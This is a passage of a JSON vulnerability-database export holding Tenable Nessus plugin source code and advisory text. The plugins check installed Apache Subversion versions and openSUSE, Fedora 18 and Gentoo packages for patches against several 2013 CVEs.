["cpe:/a:apache:subversion"], "id": "SUBVERSION_1_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/71566", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71566);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/30 15:31:32\");\n\n script_cve_id(\"CVE-2013-2088\", \"CVE-2013-4131\");\n script_bugtraq_id(60265, 61454);\n\n script_name(english:\"Apache Subversion 1.6.x / 1.7.x / 1.8.x < 1.6.23 / 1.7.11 / 1.8.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Subversion Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Subversion Server is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists in two files in the\n 'contrib/' directory that could allow arbitrary code\n execution. Note that this issue does not affect version\n 1.8.0. (CVE-2013-2088)\n\n - An error exists related to the 'mod_dav_svn' Apache\n module that could allow denial of service attacks. Note\n that this issue does not affect the 1.6.x branch.\n (CVE-2013-4131)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://subversion.apache.org/security/CVE-2013-2088-advisory.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://subversion.apache.org/security/CVE-2013-4131-advisory.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Subversion Server 1.6.23 / 1.7.11 / 1.8.1 or later, or\napply the vendor patches or workarounds.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:subversion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"subversion_installed.nasl\");\n script_require_keys(\"installed_sw/Subversion Server\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = 'Subversion Server';\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\npath = install['path'];\nversion = install['version'];\nprovider = install['Packaged with'];\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Affected :\n# 1.6.x < 1.6.23\n# 1.7.x < 1.7.11\n# 1.8.x < 1.8.1\nif (\n (ver_compare(ver:version, fix:'1.6.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.6.23', strict:FALSE) == -1) ||\n (ver_compare(ver:version, fix:'1.7.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.7.11', strict:FALSE) == -1) ||\n (ver_compare(ver:version, fix:'1.8.0', strict:FALSE) >= 0 && ver_compare(ver:version, fix:'1.8.1', strict:FALSE) == -1)\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report = '\\n Path : ' + path +\n '\\n Packaged with : ' + provider +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.6.23 / 1.7.11 / 1.8.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, provider + ' ' + appname, version, path);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:40", "description": "This update of subversion includes several bug and security fixes.\n\n - update to 1.7.10 [bnc#821505] CVE-2013-1968\n CVE-2013-2088 CVE-2013-2112\n\n - Client-side bugfixes :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values aren't\n UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\n - Server-side bugfixes :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is aborted\n\n - fix svnserve memory use after clear\n\n - fix repository corruption on power/disk failure on\n Windows\n\n - Developer visible changes :\n\n - make get-deps.sh compatible with Solaris /bin/sh\n\n - fix infinite recursion bug in get-deps.sh\n\n - fix uninitialised output parameter of\n svn_fs_commit_txn()\n\n - Bindings :\n\n - fix JavaHL thread-safety bug", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : subversion (openSUSE-SU-2013:1006-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:subversion-python", "p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:subversion-tools-debuginfo", "p-cpe:/a:novell:opensuse:subversion-debugsource", "p-cpe:/a:novell:opensuse:subversion-tools", "p-cpe:/a:novell:opensuse:subversion", "p-cpe:/a:novell:opensuse:subversion-bash-completion", "p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0", "p-cpe:/a:novell:opensuse:subversion-devel", "p-cpe:/a:novell:opensuse:subversion-server-debuginfo", "p-cpe:/a:novell:opensuse:subversion-perl", "p-cpe:/a:novell:opensuse:subversion-server", "p-cpe:/a:novell:opensuse:subversion-python-debuginfo", "p-cpe:/a:novell:opensuse:subversion-perl-debuginfo", "p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0-debuginfo", "p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0-debuginfo", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:subversion-debuginfo"], "id": "OPENSUSE-2013-494.NASL", "href": "https://www.tenable.com/plugins/nessus/75035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-494.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75035);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_bugtraq_id(60264, 60265, 60267);\n\n script_name(english:\"openSUSE Security Update : subversion (openSUSE-SU-2013:1006-1)\");\n script_summary(english:\"Check for the openSUSE-2013-494 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of subversion includes several bug and security fixes.\n\n - update to 1.7.10 [bnc#821505] CVE-2013-1968\n CVE-2013-2088 CVE-2013-2112\n\n - Client-side bugfixes :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values aren't\n UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\n - Server-side bugfixes :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is aborted\n\n - fix svnserve memory use after clear\n\n - fix repository corruption on power/disk failure on\n Windows\n\n - Developer visible changes :\n\n - make get-deps.sh compatible with Solaris /bin/sh\n\n - fix infinite recursion bug in get-deps.sh\n\n - fix uninitialised output parameter of\n svn_fs_commit_txn()\n\n - Bindings :\n\n - fix JavaHL thread-safety bug\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=821505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-06/msg00136.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected subversion packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_gnome_keyring-1-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsvn_auth_kwallet-1-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:subversion-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_gnome_keyring-1-0-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_gnome_keyring-1-0-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_kwallet-1-0-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libsvn_auth_kwallet-1-0-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-bash-completion-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-debugsource-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-devel-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-perl-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-perl-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-python-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-python-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-server-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-server-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-tools-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"subversion-tools-debuginfo-1.7.10-4.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_gnome_keyring-1-0-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_gnome_keyring-1-0-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_kwallet-1-0-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libsvn_auth_kwallet-1-0-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-bash-completion-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-debugsource-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-devel-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-perl-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-perl-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-python-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-python-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-server-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-server-debuginfo-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-tools-1.7.10-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"subversion-tools-debuginfo-1.7.10-2.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsvn_auth_gnome_keyring-1-0 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:10:57", "description": "This update includes the latest release of Apache Subversion 1.7,\nversion 1.7.11. Several security vulnerabilities are fixed in this\nupdate :\n\nSubversion's mod_dav_svn Apache HTTPD server module will trigger an\nassertion on some requests made against a revision root. This can lead\nto a DoS. If assertions are disabled it will trigger a read overflow\nwhich may cause a segmentation fault or undefined behavior. Commit\naccess is required to exploit this. (CVE-2013-4131)\n\nIf a filename which contains a newline character (ASCII 0x0a) is\ncommitted to a repository using the FSFS format, the resulting\nrevision is corrupt. This can lead to disruption for users of the\nrepository. (CVE-2013-1968)\n\nSubversion's contrib/ directory contains two example hook scripts,\nwhich use 'svnlook changed' to examine a revision or transaction and\nthen pass those paths as arguments to further 'svnlook' commands,\nwithout properly escaping the command-line. (CVE-2013-2088)\n\nSubversion's svnserve server process may exit when an incoming TCP\nconnection is closed early in the connection process. This can lead to\ndisruption for users of the server. (CVE-2013-2112)\n\nThe following client-side bugs were fixed in the 1.7.10 release :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values\n aren't UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\nThe following server-side bugs are fixed :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is\n aborted\n\n - fix svnserve memory use after clear\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-08-15T00:00:00", "title": "Fedora 18 : subversion-1.7.11-1.fc18.1 (2013-13672)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2013-08-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:subversion"], "id": "FEDORA_2013-13672.NASL", "href": "https://www.tenable.com/plugins/nessus/69355", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-13672.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69355);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\");\n script_xref(name:\"FEDORA\", value:\"2013-13672\");\n\n script_name(english:\"Fedora 18 : subversion-1.7.11-1.fc18.1 (2013-13672)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of Apache Subversion 1.7,\nversion 1.7.11. Several security vulnerabilities are fixed in this\nupdate :\n\nSubversion's mod_dav_svn Apache HTTPD server module will trigger an\nassertion on some requests made against a revision root. This can lead\nto a DoS. If assertions are disabled it will trigger a read overflow\nwhich may cause a segmentation fault or undefined behavior. Commit\naccess is required to exploit this. (CVE-2013-4131)\n\nIf a filename which contains a newline character (ASCII 0x0a) is\ncommitted to a repository using the FSFS format, the resulting\nrevision is corrupt. This can lead to disruption for users of the\nrepository. (CVE-2013-1968)\n\nSubversion's contrib/ directory contains two example hook scripts,\nwhich use 'svnlook changed' to examine a revision or transaction and\nthen pass those paths as arguments to further 'svnlook' commands,\nwithout properly escaping the command-line. (CVE-2013-2088)\n\nSubversion's svnserve server process may exit when an incoming TCP\nconnection is closed early in the connection process. This can lead to\ndisruption for users of the server. (CVE-2013-2112)\n\nThe following client-side bugs were fixed in the 1.7.10 release :\n\n - fix 'svn revert' 'no such table: revert_list' spurious\n error\n\n - fix 'svn diff' doesn't show some locally added files\n\n - fix changelist filtering when --changelist values\n aren't UTF8\n\n - fix 'svn diff --git' shows wrong copyfrom\n\n - fix 'svn diff -x-w' shows wrong changes\n\n - fix 'svn blame' sometimes shows every line as modified\n\n - fix regression in 'svn status -u' output for externals\n\n - fix file permissions change on commit of file with\n keywords\n\n - improve some fatal error messages\n\n - fix externals not removed when working copy is made\n shallow\n\nThe following server-side bugs are fixed :\n\n - fix repository corruption due to newline in filename\n\n - fix svnserve exiting when a client connection is\n aborted\n\n - fix svnserve memory use after clear\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970037\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=986194\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb0cfdf6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected subversion package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"subversion-1.7.11-1.fc18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"subversion\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:54:45", "description": "The remote host is affected by the vulnerability described in GLSA-201309-11\n(Subversion: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Subversion. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition or obtain\n sensitive information. A local attacker could escalate his privileges to\n the user running svnserve.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2013-09-24T00:00:00", "title": "GLSA-201309-11 : Subversion: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2013-09-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:subversion"], "id": "GENTOO_GLSA-201309-11.NASL", "href": "https://www.tenable.com/plugins/nessus/70084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201309-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70084);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-4539\", \"CVE-2010-4644\", \"CVE-2011-0715\", \"CVE-2011-1752\", \"CVE-2011-1783\", \"CVE-2011-1921\", \"CVE-2013-1845\", \"CVE-2013-1846\", \"CVE-2013-1847\", \"CVE-2013-1849\", \"CVE-2013-1884\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\", \"CVE-2013-4277\");\n script_bugtraq_id(45655, 46734, 48091, 58323, 58895, 58896, 58897, 58898, 60264, 60265, 60267, 61454, 62266);\n script_xref(name:\"GLSA\", value:\"201309-11\");\n\n script_name(english:\"GLSA-201309-11 : Subversion: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201309-11\n(Subversion: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Subversion. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition or obtain\n sensitive information. A local attacker could escalate his privileges to\n the user running svnserve.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201309-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Subversion users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/subversion-1.7.13'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/23\");\n 